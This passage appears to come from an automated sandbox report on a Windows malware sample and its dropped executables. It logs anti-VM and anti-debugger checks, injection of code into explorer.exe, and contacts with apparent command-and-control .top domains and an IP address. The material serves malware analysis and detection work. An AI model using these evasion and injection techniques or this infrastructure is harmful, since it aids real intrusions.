                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\8433.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\8433.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\8433.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\8433.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\8433.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\8433.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\8433.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\8433.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\8433.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\8433.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\8433.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\8433.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\8433.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\8433.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\8433.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\8433.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\8433.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\8433.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\8433.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\8433.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\8433.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\8433.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\8433.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\8433.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\8433.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\8433.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\8433.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\8433.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion:

                    barindex
                    Query firmware table information (likely to detect VMs)Show sources
                    Source: C:\Users\user\AppData\Local\Temp\8433.exeSystem information queried: FirmwareTableInformation
                    Tries to detect sandboxes / dynamic malware analysis system (registry check)Show sources
                    Source: C:\Users\user\AppData\Local\Temp\8433.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                    Source: pAWNholT8X.exe, 00000004.00000002.435547684.000000000072A000.00000004.00000020.sdmpBinary or memory string: ASWHOOK
                    Tries to detect virtualization through RDTSC time measurementsShow sources
                    Source: C:\Users\user\AppData\Local\Temp\FE25.exeRDTSC instruction interceptor: First address: 00000000017D47ED second address: 00000000017D47FF instructions: 0x00000000 rdtsc 0x00000002 dec ecx 0x00000003 or esi, 19626E18h 0x00000009 inc ecx 0x0000000a pop edx 0x0000000b dec eax 0x0000000c cdq 0x0000000d inc ecx 0x0000000e dec bl 0x00000010 inc ecx 0x00000011 pop ebx 0x00000012 rdtsc
                    Checks if the current machine is a virtual machine (disk enumeration)Show sources
                    Source: C:\Users\user\Desktop\pAWNholT8X.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                    Source: C:\Users\user\Desktop\pAWNholT8X.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                    Source: C:\Users\user\Desktop\pAWNholT8X.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                    Source: C:\Users\user\Desktop\pAWNholT8X.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                    Source: C:\Users\user\Desktop\pAWNholT8X.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                    Source: C:\Users\user\Desktop\pAWNholT8X.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                    Source: C:\Users\user\AppData\Local\Temp\6CB1.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                    Source: C:\Users\user\AppData\Local\Temp\6CB1.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                    Source: C:\Users\user\AppData\Local\Temp\6CB1.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                    Source: C:\Users\user\AppData\Local\Temp\6CB1.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                    Source: C:\Users\user\AppData\Local\Temp\6CB1.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                    Source: C:\Users\user\AppData\Local\Temp\6CB1.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                    Source: C:\Windows\System32\svchost.exe TID: 6120Thread sleep time: -30000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\757C.exe TID: 6264Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\8433.exe TID: 6736Thread sleep time: -48000s >= -30000s
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 573
                    Source: C:\Users\user\AppData\Local\Temp\8433.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                    Source: C:\Users\user\AppData\Local\Temp\8433.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                    Source: C:\Users\user\AppData\Local\Temp\8433.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeThread delayed: delay time: 922337203685477
                    Source: explorer.exe, 00000006.00000000.422145782.00000000083E9000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
                    Source: explorer.exe, 00000006.00000000.422273157.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
                    Source: 757C.exe, 00000016.00000002.688075628.0000000006665000.00000004.00000001.sdmpBinary or memory string: VMware
                    Source: explorer.exe, 00000006.00000000.399222853.00000000062E0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: explorer.exe, 00000006.00000000.422145782.00000000083E9000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
                    Source: explorer.exe, 00000006.00000000.404675893.0000000008551000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}$$t<a
                    Source: svchost.exe, 0000000D.00000002.502918415.000001D408270000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW0
                    Source: explorer.exe, 00000006.00000000.399222853.00000000062E0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: svchost.exe, 0000000D.00000002.503887822.000001D4082EB000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                    Source: explorer.exe, 00000006.00000000.376541265.000000000095C000.00000004.00000020.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}R
                    Source: explorer.exe, 00000006.00000000.421771506.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
                    Source: explorer.exe, 00000006.00000000.421771506.00000000082E2000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
                    Source: 757C.exe, 00000016.00000002.688075628.0000000006665000.00000004.00000001.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMwareB7WSVAM5Win32_VideoControllerM7PFZW8UVideoController120060621000000.000000-00019543348display.infMSBDAWDBGRY9PPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsP9LS9DUN
                    Source: explorer.exe, 00000006.00000000.422273157.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
                    Source: explorer.exe, 00000006.00000000.376541265.000000000095C000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
                    Source: C:\Users\user\Desktop\pAWNholT8X.exeProcess information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\pAWNholT8X.exeSystem information queried: ModuleInformation

                    Anti Debugging:

                    barindex
                    Tries to detect sandboxes and other dynamic analysis tools (window names)Show sources
                    Source: C:\Users\user\AppData\Local\Temp\8433.exeOpen window title or class name: regmonclass
                    Source: C:\Users\user\AppData\Local\Temp\8433.exeOpen window title or class name: gbdyllo
                    Source: C:\Users\user\AppData\Local\Temp\8433.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\8433.exeOpen window title or class name: procmon_window_class
                    Source: C:\Users\user\AppData\Local\Temp\8433.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\8433.exeOpen window title or class name: ollydbg
                    Source: C:\Users\user\AppData\Local\Temp\8433.exeOpen window title or class name: filemonclass
                    Source: C:\Users\user\AppData\Local\Temp\8433.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                    Hides threads from debuggersShow sources
                    Source: C:\Users\user\AppData\Local\Temp\8433.exeThread information set: HideFromDebugger
                    Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))Show sources
                    Source: C:\Users\user\Desktop\pAWNholT8X.exeSystem information queried: CodeIntegrityInformation
                    Source: C:\Users\user\AppData\Local\Temp\6CB1.exeSystem information queried: CodeIntegrityInformation
                    Source: C:\Users\user\Desktop\pAWNholT8X.exeCode function: 0_2_00405286 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,
                    Source: C:\Users\user\Desktop\pAWNholT8X.exeCode function: 0_2_00656F53 push dword ptr fs:[00000030h]
                    Source: C:\Users\user\AppData\Roaming\ecrjwibCode function: 15_2_00590042 push dword ptr fs:[00000030h]
                    Source: C:\Users\user\AppData\Roaming\ecrjwibCode function: 15_2_00766633 push dword ptr fs:[00000030h]
                    Source: C:\Users\user\AppData\Local\Temp\6CB1.exeCode function: 16_2_00730042 push dword ptr fs:[00000030h]
                    Source: C:\Users\user\AppData\Local\Temp\6CB1.exeCode function: 16_2_007A6B2B push dword ptr fs:[00000030h]
                    Source: C:\Users\user\Desktop\pAWNholT8X.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\8433.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\8433.exeProcess queried: DebugObjectHandle
                    Source: C:\Users\user\AppData\Local\Temp\8433.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\8433.exeProcess queried: DebugObjectHandle
                    Source: C:\Users\user\AppData\Local\Temp\8433.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\6CB1.exeProcess queried: DebugPort
                    Source: C:\Users\user\Desktop\pAWNholT8X.exeCode function: 0_2_004034A5 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                    Source: C:\Users\user\Desktop\pAWNholT8X.exeCode function: 4_2_0040288D LdrLoadDll,
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeMemory allocated: page read and write | page guard
                    Source: C:\Users\user\Desktop\pAWNholT8X.exeCode function: 0_2_0040782F __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                    Source: C:\Users\user\Desktop\pAWNholT8X.exeCode function: 0_2_004034A5 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                    Source: C:\Users\user\Desktop\pAWNholT8X.exeCode function: 0_2_00403977 SetUnhandledExceptionFilter,
                    Source: C:\Users\user\Desktop\pAWNholT8X.exeCode function: 0_2_00404BF5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                    Source: C:\Users\user\AppData\Local\Temp\6CB1.exeCode function: 16_2_0040782F __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                    Source: C:\Users\user\AppData\Local\Temp\6CB1.exeCode function: 16_2_004034A5 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                    Source: C:\Users\user\AppData\Local\Temp\6CB1.exeCode function: 16_2_00403977 SetUnhandledExceptionFilter,
                    Source: C:\Users\user\AppData\Local\Temp\6CB1.exeCode function: 16_2_00404BF5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

                    HIPS / PFW / Operating System Protection Evasion:

                    barindex
                    System process connects to network (likely due to code injection or exploit)Show sources
                    Source: C:\Windows\explorer.exeDomain query: nityanneron5.top
                    Source: C:\Windows\explorer.exeDomain query: lynettaram7.top
                    Source: C:\Windows\explorer.exeDomain query: umayaniela6.top
                    Source: C:\Windows\explorer.exeDomain query: jebeccallis4.top
                    Source: C:\Windows\explorer.exeDomain query: privacy-toolz-for-you-403.top
                    Source: C:\Windows\explorer.exeNetwork Connect: 216.128.137.31 80
                    Source: C:\Windows\explorer.exeDomain query: sadineyalas8.top
                    Source: C:\Windows\explorer.exeDomain query: naghenrietti1.top
                    Source: C:\Windows\explorer.exeDomain query: geenaldencia9.top
                    Source: C:\Windows\explorer.exeDomain query: kimballiett2.top
                    Source: C:\Windows\explorer.exeDomain query: xadriettany3.top
                    Benign windows process drops PE filesShow sources
                    Source: C:\Windows\explorer.exeFile created: ecrjwib.6.drJump to dropped file
                    Maps a DLL or memory area into another processShow sources
                    Source: C:\Users\user\Desktop\pAWNholT8X.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                    Source: C:\Users\user\Desktop\pAWNholT8X.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                    Source: C:\Users\user\AppData\Local\Temp\6CB1.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                    Source: C:\Users\user\AppData\Local\Temp\6CB1.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                    Injects a PE file into a foreign processesShow sources
                    Source: C:\Users\user\AppData\Roaming\ecrjwibMemory written: C:\Users\user\AppData\Roaming\ecrjwib base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\AppData\Local\Temp\6CB1.exeMemory written: C:\Users\user\AppData\Local\Temp\6CB1.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeMemory written: C:\Users\user\AppData\Local\Temp\757C.exe base: 400000 value starts with: 4D5A
                    Contains functionality to inject code into remote processesShow sources
                    Source: C:\Users\user\AppData\Roaming\ecrjwibCode function: 15_2_00590110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                    Creates a thread in another existing process (thread injection)Show sources
                    Source: C:\Users\user\Desktop\pAWNholT8X.exeThread created: C:\Windows\explorer.exe EIP: 2DC1A20
                    Source: C:\Users\user\AppData\Local\Temp\6CB1.exeThread created: unknown EIP: 4151A20
                    Source: C:\Users\user\Desktop\pAWNholT8X.exeProcess created: C:\Users\user\Desktop\pAWNholT8X.exe 'C:\Users\user\Desktop\pAWNholT8X.exe'
                    Source: C:\Users\user\AppData\Roaming\ecrjwibProcess created: C:\Users\user\AppData\Roaming\ecrjwib C:\Users\user\AppData\Roaming\ecrjwib
                    Source: C:\Users\user\AppData\Local\Temp\6CB1.exeProcess created: C:\Users\user\AppData\Local\Temp\6CB1.exe C:\Users\user\AppData\Local\Temp\6CB1.exe
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeProcess created: C:\Users\user\AppData\Local\Temp\757C.exe C:\Users\user\AppData\Local\Temp\757C.exe
                    Source: explorer.exe, 00000006.00000000.394707551.0000000000EE0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                    Source: explorer.exe, 00000006.00000000.394707551.0000000000EE0000.00000002.00020000.sdmpBinary or memory string: Progman
                    Source: explorer.exe, 00000006.00000000.394707551.0000000000EE0000.00000002.00020000.sdmpBinary or memory string: &Program Manager
                    Source: explorer.exe, 00000006.00000000.394707551.0000000000EE0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                    Source: C:\Users\user\Desktop\pAWNholT8X.exeCode function: GetLocaleInfoA,
                    Source: C:\Users\user\AppData\Local\Temp\6CB1.exeCode function: GetLocaleInfoA,
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeQueries volume information: C:\Users\user\AppData\Local\Temp\757C.exe VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\8433.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\8433.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\8433.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\8433.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\8433.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\8433.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\8433.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeQueries volume information: C:\Users\user\AppData\Local\Temp\757C.exe VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                    Source: C:\Users\user\Desktop\pAWNholT8X.exeCode function: 0_2_004014CC GetSystemTimeAsFileTime,_ftell,_fseek,
                    Source: 8433.exe, 00000013.00000002.697272748.0000000006C5B000.00000004.00000001.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

